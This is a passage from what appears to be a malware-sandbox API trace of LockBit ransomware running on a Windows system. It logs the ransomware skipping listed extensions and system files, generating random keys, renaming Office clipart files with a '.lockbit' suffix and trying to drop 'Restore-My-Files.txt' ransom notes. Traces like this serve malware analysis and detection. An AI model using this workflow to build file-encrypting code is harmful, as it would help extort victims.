lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0161.742] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00238_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00238_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.742] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.742] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.743] free (_Block=0x1fa2ed8) [0161.743] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00238_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.743] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.744] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.744] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc013d500, ftCreationTime.dwHighDateTime=0x1bd4b1a, ftLastAccessTime.dwLowDateTime=0x594ac510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc013d500, ftLastWriteTime.dwHighDateTime=0x1bd4b1a, nFileSizeHigh=0x0, nFileSizeLow=0x864, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA00330_.WMF", cAlternateFileName="")) returned 1 [0161.744] lstrcmpiW (lpString1=".", lpString2="NA00330_.WMF") returned -1 [0161.744] lstrcmpiW (lpString1="..", lpString2="NA00330_.WMF") returned -1 [0161.744] PathFindExtensionW (pszPath="NA00330_.WMF") returned=".WMF" [0161.744] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0161.744] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0161.744] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0161.744] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0161.744] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0161.744] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0161.744] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0161.744] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0161.744] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0161.744] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0161.744] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0161.744] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0161.744] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0161.745] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0161.745] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0161.745] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0161.745] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0161.745] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0161.745] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0161.745] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0161.745] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0161.745] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0161.745] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0161.745] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0161.745] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.745] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0161.745] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0161.745] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0161.745] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0161.745] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0161.745] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0161.745] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0161.745] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0161.746] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0161.746] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0161.746] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0161.746] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0161.746] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0161.746] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0161.746] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0161.746] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0161.746] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0161.746] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.746] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0161.746] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0161.746] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0161.746] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0161.746] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA00330_.WMF") returned 1 [0161.746] lstrcmpiW (lpString1="ntldr", lpString2="NA00330_.WMF") returned 1 [0161.746] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA00330_.WMF") returned 1 [0161.746] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA00330_.WMF") returned -1 [0161.746] lstrcmpiW (lpString1="autorun.inf", lpString2="NA00330_.WMF") returned -1 [0161.747] lstrcmpiW (lpString1="thumbs.db", lpString2="NA00330_.WMF") returned 1 [0161.747] lstrcmpiW (lpString1="iconcache.db", lpString2="NA00330_.WMF") returned -1 [0161.747] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.747] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00330_.WMF") returned=".WMF" [0161.747] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0161.755] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0161.755] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0161.755] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0161.755] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0161.755] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0161.755] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0161.755] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0161.755] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0161.756] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0161.756] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0161.756] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0161.756] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0161.756] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0161.756] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0161.756] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0161.756] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0161.756] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0161.756] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0161.756] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0161.756] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0161.756] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0161.756] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0161.756] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0161.756] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0161.756] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0161.756] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0161.756] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0161.756] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00330_.WMF.lockbit") returned 72 [0161.756] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00330_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00330_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0161.757] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.758] malloc (_Size=0x40068) returned 0x3df0008 [0161.758] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2148) returned 1 [0161.758] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.758] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.758] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0161.758] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.759] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.759] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0161.759] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0161.761] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00330_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00330_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.761] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.761] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.762] free (_Block=0x1fa2ed8) [0161.762] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00330_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.762] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.762] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.762] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x580ec000, ftCreationTime.dwHighDateTime=0x1bd4b15, ftLastAccessTime.dwLowDateTime=0x6a3248d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x580ec000, ftLastWriteTime.dwHighDateTime=0x1bd4b15, nFileSizeHigh=0x0, nFileSizeLow=0x1172, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA00388_.WMF", cAlternateFileName="")) returned 1 [0161.762] lstrcmpiW (lpString1=".", lpString2="NA00388_.WMF") returned -1 [0161.763] lstrcmpiW (lpString1="..", lpString2="NA00388_.WMF") returned -1 [0161.763] PathFindExtensionW (pszPath="NA00388_.WMF") returned=".WMF" [0161.763] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0161.763] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0161.763] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0161.763] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0161.763] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0161.763] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0161.763] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0161.763] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0161.763] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0161.763] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0161.763] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0161.763] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0161.763] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0161.763] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0161.763] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0161.763] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0161.763] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0161.763] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0161.763] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0161.763] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0161.763] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0161.763] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0161.764] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0161.764] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0161.764] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.764] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0161.764] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0161.764] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0161.764] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0161.764] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0161.764] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0161.764] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0161.764] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0161.764] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0161.764] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0161.764] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0161.764] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0161.764] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0161.764] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0161.764] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0161.764] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0161.764] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0161.764] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.764] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0161.764] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0161.764] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0161.764] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0161.764] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA00388_.WMF") returned 1 [0161.765] lstrcmpiW (lpString1="ntldr", lpString2="NA00388_.WMF") returned 1 [0161.765] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA00388_.WMF") returned 1 [0161.765] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA00388_.WMF") returned -1 [0161.765] lstrcmpiW (lpString1="autorun.inf", lpString2="NA00388_.WMF") returned -1 [0161.765] lstrcmpiW (lpString1="thumbs.db", lpString2="NA00388_.WMF") returned 1 [0161.765] lstrcmpiW (lpString1="iconcache.db", lpString2="NA00388_.WMF") returned -1 [0161.765] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.765] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00388_.WMF") returned=".WMF" [0161.765] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0161.765] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0161.765] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0161.765] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0161.765] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0161.765] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0161.765] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0161.765] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0161.765] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0161.765] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0161.765] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0161.765] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0161.765] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0161.765] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0161.765] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0161.765] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0161.765] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0161.765] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0161.765] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0161.766] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0161.766] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0161.766] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0161.766] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0161.766] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0161.766] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0161.766] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0161.766] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0161.766] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0161.766] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00388_.WMF.lockbit") returned 72 [0161.766] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00388_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00388_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0161.767] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.767] malloc (_Size=0x40068) returned 0x1ff1e60 [0161.767] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=4466) returned 1 [0161.767] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.768] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.768] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0161.768] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.768] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.768] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0161.768] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0161.772] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00388_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00388_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.772] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.773] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.774] free (_Block=0x1fa2ed8) [0161.774] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00388_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.774] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.774] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.774] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c25e800, ftCreationTime.dwHighDateTime=0x1bd4aeb, ftLastAccessTime.dwLowDateTime=0x594ac510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5c25e800, ftLastWriteTime.dwHighDateTime=0x1bd4aeb, nFileSizeHigh=0x0, nFileSizeLow=0x20ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA00389_.WMF", cAlternateFileName="")) returned 1 [0161.774] lstrcmpiW (lpString1=".", lpString2="NA00389_.WMF") returned -1 [0161.774] lstrcmpiW (lpString1="..", lpString2="NA00389_.WMF") returned -1 [0161.774] PathFindExtensionW (pszPath="NA00389_.WMF") returned=".WMF" [0161.774] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0161.774] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0161.774] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0161.774] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0161.774] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0161.774] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0161.775] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0161.775] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0161.775] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0161.775] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0161.775] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0161.775] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0161.775] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0161.775] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0161.775] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0161.775] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0161.775] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0161.775] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0161.775] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0161.775] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0161.775] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0161.775] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0161.775] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0161.775] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0161.775] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.775] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0161.775] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0161.775] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0161.776] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0161.776] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0161.776] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0161.776] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0161.776] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0161.776] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0161.776] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0161.776] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0161.776] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0161.776] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0161.776] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0161.776] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0161.776] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0161.776] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0161.776] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.776] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0161.776] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0161.776] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0161.776] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0161.776] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA00389_.WMF") returned 1 [0161.776] lstrcmpiW (lpString1="ntldr", lpString2="NA00389_.WMF") returned 1 [0161.776] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA00389_.WMF") returned 1 [0161.777] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA00389_.WMF") returned -1 [0161.777] lstrcmpiW (lpString1="autorun.inf", lpString2="NA00389_.WMF") returned -1 [0161.777] lstrcmpiW (lpString1="thumbs.db", lpString2="NA00389_.WMF") returned 1 [0161.777] lstrcmpiW (lpString1="iconcache.db", lpString2="NA00389_.WMF") returned -1 [0161.777] PathAddBackslashW (in: pszPath="C:\\\\Program 